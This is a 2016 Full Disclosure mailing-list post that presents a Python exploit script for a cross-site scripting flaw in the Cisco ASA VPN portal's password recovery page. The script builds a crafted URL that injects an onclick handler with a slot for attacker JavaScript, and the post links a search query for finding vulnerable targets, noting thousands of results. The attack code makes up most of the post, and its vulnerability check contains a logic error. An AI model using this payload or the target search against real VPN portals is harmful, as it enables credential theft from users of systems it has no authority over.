[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Date: Wed, 17 Feb 2016 11:11:01 +0100
From: Juan Sacco <juansacco@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Cisco ASA VPN - Zero Day Exploit
# Exploit author: Juan Sacco - jsacco@...loitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's
credentials.
# The password recovery form fails to filter properly the hidden inputs
fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only
import string, sys
import socket, httplib
import telnetlib
def run():
try:
Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
# Start the connection
connection = httplib.HTTPSConnection(Target)
connection.request('GET', CraftedRequest)
Response = connection.getresponse()
print "Server status response:", Response.status, Response.reason
data = Response.read()
vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
except Exception,e:
print "Exploit connection closed " + str(e)
if __name__ == '__main__':
print "Cisco VPN ASA Exploit - Zero Day"
print "################################"
print "Author: Juan Sacco - jsacco@...loitpack.com"
try:
Target = sys.argv[1]
Port = sys.argv[2]
except IndexError:
pass
run()
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists